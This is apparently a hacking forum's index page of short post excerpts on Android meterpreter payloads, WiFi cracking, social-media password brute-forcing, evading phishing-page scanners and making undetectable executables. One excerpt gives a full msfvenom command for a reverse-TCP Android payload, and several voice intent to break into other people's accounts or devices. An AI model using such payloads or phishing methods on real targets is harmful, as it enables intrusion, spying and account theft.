NEW VERSION : https://Null-byte.wonderhowto.com/Forum/Hacking-Facebook-Twitter-Instagram-Account-Passwords-with-Bruteforce-0181808/
I opened a meterpreter session on my android phone and was able to run all the basic commands such as dumpcalllog and webcamlist etc... however when i try to access and/or change directories such as /Internal storage/DCIM/Camera using the 'cd' command i get a stdapi error, and i believe it is due to there being a space within the internal storage directory, but im not positive... is there a work around for this? ive looked up so many different pages to find this answer and i cannot seem to fi...
Hey, Which language would you recomm for me, for this hacking stuff?
Yo fellas! This is my first null byte writing,so any errors or mistakes regarding post are welcome. I have seen in the post of HOW TO HACK ANDROID WITH KALI. But many people are facing problems on hacking the android which is not on the same network as of that of the attacker. So today i am gonna show you how to hack android with port forwarding with portmap.io. So lets get rollin'!!!
Hi, lots of people including me had a problem in the meterpreter. Just Like this : Here, I will show you how I solved this problem.
I've needed a decent laptop for a while, and figured that this would be a good place to ask. My budget isn't huge, probably up to $600 or $700. Any suggestions?
SUP, My fellow hackers! This time I am doing a tutorial on a tool called TRAPE, it can track and do things in the victim's device.
Hey, I was using Fatrat to create a reverse tcp payload for android. I have been successful in getting a metasploit session when both my attacker and target are on the same LAN.
Hey Sup hackers, I installed kali Linux (Linux kali 5.2.0-kalu2-amd64 #1 SMP Debian 5.2.9kali1 (2019-0822) x86_64 GNU/Linux) on live usb persistence mode as per the guidelines given on kali documentation.
recently i went to his room i connected to his wifi network he gave me the password,i tried to open wifi control panel luckily he left with default username and password.
Hello techies? I'm using Debian, Kali to be exact. Whenever I try sudo su, it executes the /usr/bin/zsh and I don't know how I set this or how to bring it back to normal. Someone to help
Hi guys, I am back. And as I promised I will be bringing you a way to hack someone's facebook. You can use it for any other thing as well, not just facebook. Let's get started.
So, I got a problem that I have 0 ideas how to solve. Trying to crack my own wifi, with the ALFA AWUS036ACH network adapter...
Hi, i am having a very weird problem i set up my payload with msfvenom here is my output: msfvenom -p android/meterpreter/reversetcp LHOST=Public Ip LPORT=4444 R > /root/Desktop/android.apk
Hi My Fellow H4CK3Rs Today, I`m gonna show you: "How To Sign the APK File with Embedded Payload". The following Methods work 100%. So, Follow the steps carefully. But before getting started, if you are a beginner, then read the following Answers first...
Hey everybody. So this week I've been making it my mission to learn a bit about THC Hydra and all the little bells and whistles it has to offer — trust me, there are A LOT.
I have had success with msfvenom android payload over LAN but now I want to test it outside LAN. Like when you and the victim are connected to different gateways.
I'm new to Linux, and recently tried WiFi hacking with the built-in tool in kali Linux i.e Wifite. I managed to capture handshake file. But the application couldn't crack the password with the help of brute force. Is there any other way I can decrypt the password from the .CAP file generated???
This is my first tutorial/how-to on this website so do not be mean with me. I will try to keep it as simple as it is.
Hi, I want to have a phishing page hosted on a hosting website. Preferably a free hosting website but I wouldn't mind purchasing hosting. I have read now that hosting companies now have scanners that detect phishing pages.
I am new to this whole realm of the computer so I do apprecate your patience and help. I am running Black Hydra Brute Force (Option 4 - Gmail) and I am stuck on what do do next.
Hi all. Awesome website. Do you know how ti install kali linux on ipad or iphone?
I was thinking of using ngrok in a reverse_tcp attack over the internet on Kali Linux. But couldn't do so, I didn't get an open session, I use the ngrok url in place of the LHOST while creating the payload.
Instagram is one of the most widely used social media applications. I am pretty confident that at least one of your friends or you are using it pretty much everyday. Today I am going to show you how a hacker could crack someone's Instagram password using a script called Instainsane.
My Phone Just Got Stolen and I Have the Imei Number. Is There a Way I Could Get the Location of the Phone Using the Imei Number. Thank You.
Hello friends . we have been increasingly bombed by IOT ( internet of things ) that's why i am writing this thread .since it is inevitable progress, interaction, and acquisition of the products that are under this implementation.
I got some information and i got to know that reverse shell is when attacker listen and victim tries to connect to attacker and in bind shell attacker connects to victim but i want know at what condition a hacker or pentester uses reverse shell or bind shell?which is mostly used by hackers?when a reverse shell should be used and when should bind shell should be used
Hello everyone, im new to wifi hacking and cracking and i really like fluxion. However when i use fluxion after ive chosen the network,chosen deauth option,made certificate after doing all that at teh end when everything is setup. Nothing happens it doesnt work. Also do you need to be connected to wifi while doing this because when i select language it closes NetworkManager. Thanks.
here and here
After a scan with Acunetix I found a vulnerability "Blind SQL Injection". Now what should I do?
Sorry. It is Bruteforce again. If you saw my tutorial on getting Instagram accounts passwords, there were lots of complains that the script was no working well. Well, that was not my script, so I decided to make one myself instead.
I am going to learn programming language and my friends are suggesting me to learn C. need help...
Hi all null byters!!:)
Is there anyway i can send a file to a computer using its ip address .
hey dear hackers and coders in null -byte so i wanted to have some fun with armitage hacking webservers with it
Hi there my hacking mates, I recently fell in love with metasploit and currently I'm into pentesting Android devices. I already managed to drop an android meterpreter shell with help of an .apk, but I'd like to take it a step further.
Hello everyone, this is my first post so play nice with me. We are going to create an undetectable (meterpreter/shell/vnc) executable in under 15 minutes.
i have a android phone and im wondering if i could get remote access to it with just the ip of the device and being able to look to whatsapp etc . i would like to preform actions like in a metasploit session but just without an file that needs to be installed on the device
In Metasploit, there's an auxilary module that detects joomla version and it requires RHOST. Is it possible to set RHOST to http://example.com? It flags an error when I do that. So how can i pass the domain name as rhost?